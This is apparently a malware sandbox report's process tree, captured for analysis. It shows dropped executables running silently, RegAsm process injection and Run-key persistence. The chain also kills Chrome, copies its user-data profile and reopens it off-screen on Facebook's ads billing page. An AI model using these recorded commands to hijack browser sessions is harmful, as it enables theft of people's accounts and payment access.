"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1812,11235744228527955939,4581604599443034037,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6740 /prefetch:1
15⤵
PID:5848

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1812,11235744228527955939,4581604599443034037,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7128 /prefetch:8
15⤵
PID:8296

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1812,11235744228527955939,4581604599443034037,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7124 /prefetch:8
15⤵
PID:9856

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1812,11235744228527955939,4581604599443034037,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7396 /prefetch:8
15⤵
PID:9916

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1812,11235744228527955939,4581604599443034037,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7380 /prefetch:8
15⤵
PID:9992

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1812,11235744228527955939,4581604599443034037,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7660 /prefetch:8
15⤵
PID:10040

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1812,11235744228527955939,4581604599443034037,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7272 /prefetch:8
15⤵
PID:10072

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1812,11235744228527955939,4581604599443034037,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7932 /prefetch:8
15⤵
PID:8252

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1812,11235744228527955939,4581604599443034037,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8080 /prefetch:8
15⤵
PID:10128

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1812,11235744228527955939,4581604599443034037,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=44 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8200 /prefetch:1
15⤵
PID:10216

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1812,11235744228527955939,4581604599443034037,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8452 /prefetch:8
15⤵
PID:6316

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1812,11235744228527955939,4581604599443034037,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8624 /prefetch:8
15⤵
PID:10144

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1812,11235744228527955939,4581604599443034037,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8764 /prefetch:8
15⤵
PID:9300

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1812,11235744228527955939,4581604599443034037,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8880 /prefetch:8
15⤵
PID:9904

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1812,11235744228527955939,4581604599443034037,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=9028 /prefetch:8
15⤵
PID:9436

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1812,11235744228527955939,4581604599443034037,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=49 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8908 /prefetch:1
15⤵
PID:6208

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1812,11235744228527955939,4581604599443034037,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=9304 /prefetch:8
15⤵
PID:9572

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1812,11235744228527955939,4581604599443034037,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=9428 /prefetch:8
15⤵
PID:5104

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1812,11235744228527955939,4581604599443034037,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=9296 /prefetch:8
15⤵
PID:6432

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1812,11235744228527955939,4581604599443034037,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6996 /prefetch:8
15⤵
PID:5432

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1812,11235744228527955939,4581604599443034037,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6024 /prefetch:8
15⤵
PID:7372

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1812,11235744228527955939,4581604599443034037,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4872 /prefetch:8
15⤵
PID:4332

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1812,11235744228527955939,4581604599443034037,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=8056 /prefetch:8
15⤵
PID:5584

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1812,11235744228527955939,4581604599443034037,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1468 /prefetch:8
15⤵
PID:6748

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1812,11235744228527955939,4581604599443034037,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.15063.0 --gpu-preferences=MAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAIAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1636 /prefetch:2
15⤵
PID:8732

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1812,11235744228527955939,4581604599443034037,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5860 /prefetch:8
15⤵
PID:8204

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1812,11235744228527955939,4581604599443034037,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7000 /prefetch:8
15⤵
PID:7492

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1812,11235744228527955939,4581604599443034037,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5976 /prefetch:8
15⤵
PID:7560

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1812,11235744228527955939,4581604599443034037,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4708 /prefetch:8
15⤵
PID:7612

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1812,11235744228527955939,4581604599443034037,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8396 /prefetch:8
15⤵
PID:2756

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1812,11235744228527955939,4581604599443034037,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1464 /prefetch:8
15⤵
PID:1264

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1812,11235744228527955939,4581604599443034037,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1644 /prefetch:8
15⤵
PID:7860

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1812,11235744228527955939,4581604599443034037,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=9644 /prefetch:8
15⤵
PID:9688

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1812,11235744228527955939,4581604599443034037,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3516 /prefetch:8
15⤵
PID:7516

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1812,11235744228527955939,4581604599443034037,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2524 /prefetch:8
15⤵
PID:9520

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1812,11235744228527955939,4581604599443034037,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7904 /prefetch:8
15⤵
PID:8972

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\SwReporter\89.257.200\software_reporter_tool.exe
"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\SwReporter\89.257.200\software_reporter_tool.exe" --engine=2 --scan-locations=1,2,3,4,5,6,7,8,10 --disabled-locations=9,11 --session-id=J+KixgdrZDFt5pP8UO7Ka6HmbzpnpDyM5/XNyxd8 --registry-suffix=ESET --srt-field-trial-group-name=Off
15⤵
PID:6240

\??\c:\users\admin\appdata\local\google\chrome\user data\swreporter\89.257.200\software_reporter_tool.exe
"c:\users\admin\appdata\local\google\chrome\user data\swreporter\89.257.200\software_reporter_tool.exe" --crash-handler "--database=c:\users\admin\appdata\local\Google\Software Reporter Tool" --url=https://clients2.google.com/cr/report --annotation=plat=Win32 --annotation=prod=ChromeFoil --annotation=ver=89.257.200 --initial-client-data=0x244,0x248,0x24c,0x220,0x250,0x7ff7d3aeac28,0x7ff7d3aeac38,0x7ff7d3aeac48
16⤵
PID:5964

\??\c:\users\admin\appdata\local\google\chrome\user data\swreporter\89.257.200\software_reporter_tool.exe
"c:\users\admin\appdata\local\google\chrome\user data\swreporter\89.257.200\software_reporter_tool.exe" --use-crash-handler-with-id="\\.\pipe\crashpad_6240_XDKZGHOETYBRTUJK" --sandboxed-process-id=2 --init-done-notifier=716 --sandbox-mojo-pipe-token=15001764806230284295 --mojo-platform-channel-handle=692 --engine=2
16⤵
- Loads dropped DLL
PID:2472

\??\c:\users\admin\appdata\local\google\chrome\user data\swreporter\89.257.200\software_reporter_tool.exe
"c:\users\admin\appdata\local\google\chrome\user data\swreporter\89.257.200\software_reporter_tool.exe" --use-crash-handler-with-id="\\.\pipe\crashpad_6240_XDKZGHOETYBRTUJK" --sandboxed-process-id=3 --init-done-notifier=912 --sandbox-mojo-pipe-token=14989450991199864258 --mojo-platform-channel-handle=908
16⤵
PID:8128

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1812,11235744228527955939,4581604599443034037,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=9716 /prefetch:8
15⤵
PID:6620

C:\Users\Admin\AppData\Local\Temp\csrss\mg20201223-1.exe
C:\Users\Admin\AppData\Local\Temp\csrss\mg20201223-1.exe
12⤵
PID:5136

C:\Users\Admin\AppData\Local\Temp\csrss\ml20201223.exe
C:\Users\Admin\AppData\Local\Temp\csrss\ml20201223.exe
12⤵
PID:6408

C:\Users\Admin\AppData\Local\Temp\csrss\m672.exe
C:\Users\Admin\AppData\Local\Temp\csrss\m672.exe
12⤵
PID:4868

C:\Users\Admin\AppData\Local\Temp\csrss\updateprofile-15.exe
C:\Users\Admin\AppData\Local\Temp\csrss\updateprofile-15.exe
12⤵
PID:9064

C:\Users\Admin\AppData\Local\Temp\csrss\updateprofile-15.exe
"C:\Users\Admin\AppData\Local\Temp\csrss\updateprofile-15.exe"
13⤵
PID:11084

C:\Users\Admin\AppData\Local\Temp\tv5ksza5az4\vict.exe
"C:\Users\Admin\AppData\Local\Temp\tv5ksza5az4\vict.exe" /VERYSILENT /id=535
8⤵
- Suspicious use of SetWindowsHookEx
PID:8696

C:\Users\Admin\AppData\Local\Temp\is-O71DB.tmp\vict.tmp
"C:\Users\Admin\AppData\Local\Temp\is-O71DB.tmp\vict.tmp" /SL5="$306D4,870426,780800,C:\Users\Admin\AppData\Local\Temp\tv5ksza5az4\vict.exe" /VERYSILENT /id=535
9⤵
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious use of SetWindowsHookEx
PID:3920

C:\Users\Admin\AppData\Local\Temp\is-RDPFJ.tmp\wimapi.exe
"C:\Users\Admin\AppData\Local\Temp\is-RDPFJ.tmp\wimapi.exe" 535
10⤵
- Suspicious use of SetWindowsHookEx
PID:7516

C:\Users\Admin\AppData\Local\Temp\o1mxsa0cnfh\askinstall24.exe
"C:\Users\Admin\AppData\Local\Temp\o1mxsa0cnfh\askinstall24.exe"
8⤵
- Drops Chrome extension
- Suspicious use of SetWindowsHookEx
PID:7976

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
9⤵
PID:8740

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
10⤵
- Kills process with taskkill
PID:640

C:\Windows\SysWOW64\xcopy.exe
xcopy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data" "C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99\" /s /e /y
9⤵
- Enumerates system info in registry
PID:9764

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --window-position=-50000,-50000 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" https://www.facebook.com/ https://www.facebook.com/pages/ https://secure.facebook.com/ads/manager/account_settings/account_billing/
9⤵
PID:4296

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99 /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99 --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0xec,0xf0,0xf4,0xc8,0xf8,0x7fff6df16e00,0x7fff6df16e10,0x7fff6df16e20
10⤵
PID:4484

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1548,8095762995117588219,4487146355214490172,131072 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1568 /prefetch:2
10⤵
PID:9628

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1548,8095762995117588219,4487146355214490172,131072 --lang=en-US --service-sandbox-type=network --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --mojo-platform-channel-handle=1960 /prefetch:8
10⤵
PID:1988

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1548,8095762995117588219,4487146355214490172,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --mojo-platform-channel-handle=2204 /prefetch:8
10⤵
PID:5592

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1548,8095762995117588219,4487146355214490172,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --origin-trial-disabled-features=SecurePaymentConfirmation --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2876 /prefetch:1
10⤵
PID:7720

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1548,8095762995117588219,4487146355214490172,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --origin-trial-disabled-features=SecurePaymentConfirmation --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2864 /prefetch:1
10⤵
PID:10204

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1548,8095762995117588219,4487146355214490172,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --extension-process --origin-trial-disabled-features=SecurePaymentConfirmation --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3640 /prefetch:1
10⤵
PID:2760

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1548,8095762995117588219,4487146355214490172,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --origin-trial-disabled-features=SecurePaymentConfirmation --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3456 /prefetch:1
10⤵
PID:7700

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1548,8095762995117588219,4487146355214490172,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --origin-trial-disabled-features=SecurePaymentConfirmation --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3328 /prefetch:1
10⤵
PID:7684

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1548,8095762995117588219,4487146355214490172,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --extension-process --origin-trial-disabled-features=SecurePaymentConfirmation --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3928 /prefetch:1
10⤵
PID:5780

C:\Users\Admin\AppData\Local\Temp\1xqws1ebtoi\Setup3310.exe
"C:\Users\Admin\AppData\Local\Temp\1xqws1ebtoi\Setup3310.exe" /Verysilent /subid=577
8⤵
- Suspicious use of SetWindowsHookEx
PID:4736

C:\Users\Admin\AppData\Local\Temp\is-M11N0.tmp\Setup3310.tmp
"C:\Users\Admin\AppData\Local\Temp\is-M11N0.tmp\Setup3310.tmp" /SL5="$10754,802346,56832,C:\Users\Admin\AppData\Local\Temp\1xqws1ebtoi\Setup3310.exe" /Verysilent /subid=577
9⤵
- Loads dropped DLL
- Suspicious use of SetWindowsHookEx
PID:10080

C:\Users\Admin\AppData\Local\Temp\is-DL4KU.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-DL4KU.tmp\Setup.exe" /Verysilent
10⤵
- Suspicious use of SetWindowsHookEx
PID:8104

C:\Users\Admin\AppData\Local\Temp\is-BVL4V.tmp\Setup.tmp
"C:\Users\Admin\AppData\Local\Temp\is-BVL4V.tmp\Setup.tmp" /SL5="$307B0,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-DL4KU.tmp\Setup.exe" /Verysilent
11⤵
- Loads dropped DLL
- Suspicious use of SetWindowsHookEx
PID:6372

C:\Users\Admin\AppData\Local\Temp\is-NMD7U.tmp\FkIw5o3KqG0E.exe
"C:\Users\Admin\AppData\Local\Temp\is-NMD7U.tmp\FkIw5o3KqG0E.exe" /Verysilent
12⤵
- Suspicious use of SetThreadContext
PID:7484

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
13⤵
- Suspicious use of SetWindowsHookEx
PID:5984

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
13⤵
- Suspicious use of SetWindowsHookEx
PID:5708

C:\Users\Admin\AppData\Local\Temp\WHSIDII616\multitimer.exe
"C:\Users\Admin\AppData\Local\Temp\WHSIDII616\multitimer.exe" 0 30603cc16d3187a8.64379538 0 105
14⤵
PID:10752

C:\Users\Admin\AppData\Local\Temp\WHSIDII616\multitimer.exe
"C:\Users\Admin\AppData\Local\Temp\WHSIDII616\multitimer.exe" 1 3.1615558287.604b768f3e8bf 105
15⤵
- Adds Run key to start application
PID:9280

C:\Users\Admin\AppData\Local\Temp\WHSIDII616\multitimer.exe
"C:\Users\Admin\AppData\Local\Temp\WHSIDII616\multitimer.exe" 2 3.1615558287.604b768f3e8bf
16⤵
- Maps connected drives based on registry
- Enumerates system info in registry
PID:10660

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
13⤵
PID:2988

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
13⤵
PID:6488

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
13⤵
PID:7768

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
13⤵
- Suspicious use of SetWindowsHookEx
PID:3232

C:\Users\Admin\AppData\Local\Temp\6657TQJWI9\multitimer.exe
"C:\Users\Admin\AppData\Local\Temp\6657TQJWI9\multitimer.exe" 0 30603cc16d3187a8.64379538 0 105
14⤵
- Drops file in Windows directory
PID:10888

C:\Users\Admin\AppData\Local\Temp\6657TQJWI9\multitimer.exe
"C:\Users\Admin\AppData\Local\Temp\6657TQJWI9\multitimer.exe" 1 3.1615558288.604b769024375 105
15⤵
- Adds Run key to start application
PID:5064

C:\Users\Admin\AppData\Local\Temp\6657TQJWI9\multitimer.exe
"C:\Users\Admin\AppData\Local\Temp\6657TQJWI9\multitimer.exe" 2 3.1615558288.604b769024375
16⤵
- Maps connected drives based on registry
- Enumerates system info in registry
PID:7880

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
13⤵
PID:7388

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
13⤵
- Suspicious use of SetWindowsHookEx
PID:5432

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
14⤵
PID:10600

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
15⤵
- Kills process with taskkill
PID:11040

C:\Windows\SysWOW64\xcopy.exe
xcopy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data" "C:\Users\Admin\AppData\Local\Temp\dvhgjkidh99\" /s /e /y
14⤵
- Enumerates system info in registry
PID:10508

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --window-position=-50000,-50000 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\dvhgjkidh99" https://www.facebook.com/ https://www.facebook.com/pages/ https://secure.facebook.com/ads/manager/account_settings/account_billing/
14⤵
PID:5572

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\dvhgjkidh99 /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\dvhgjkidh99\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\dvhgjkidh99 --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0xec,0xf0,0xf4,0xc8,0xf8,0x7fff6df16e00,0x7fff6df16e10,0x7fff6df16e20
15⤵
PID:10728

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1508,2296844412489350721,857595891094170210,131072 --lang=en-US --service-sandbox-type=network --user-data-dir="C:\Users\Admin\AppData\Local\Temp\dvhgjkidh99" --mojo-platform-channel-handle=1936 /prefetch:8
15⤵
PID:7792

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1508,2296844412489350721,857595891094170210,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\dvhgjkidh99" --mojo-platform-channel-handle=2260 /prefetch:8
15⤵
PID:11236

C:\Program Files\Google\Chrome\Application\chrome.exe
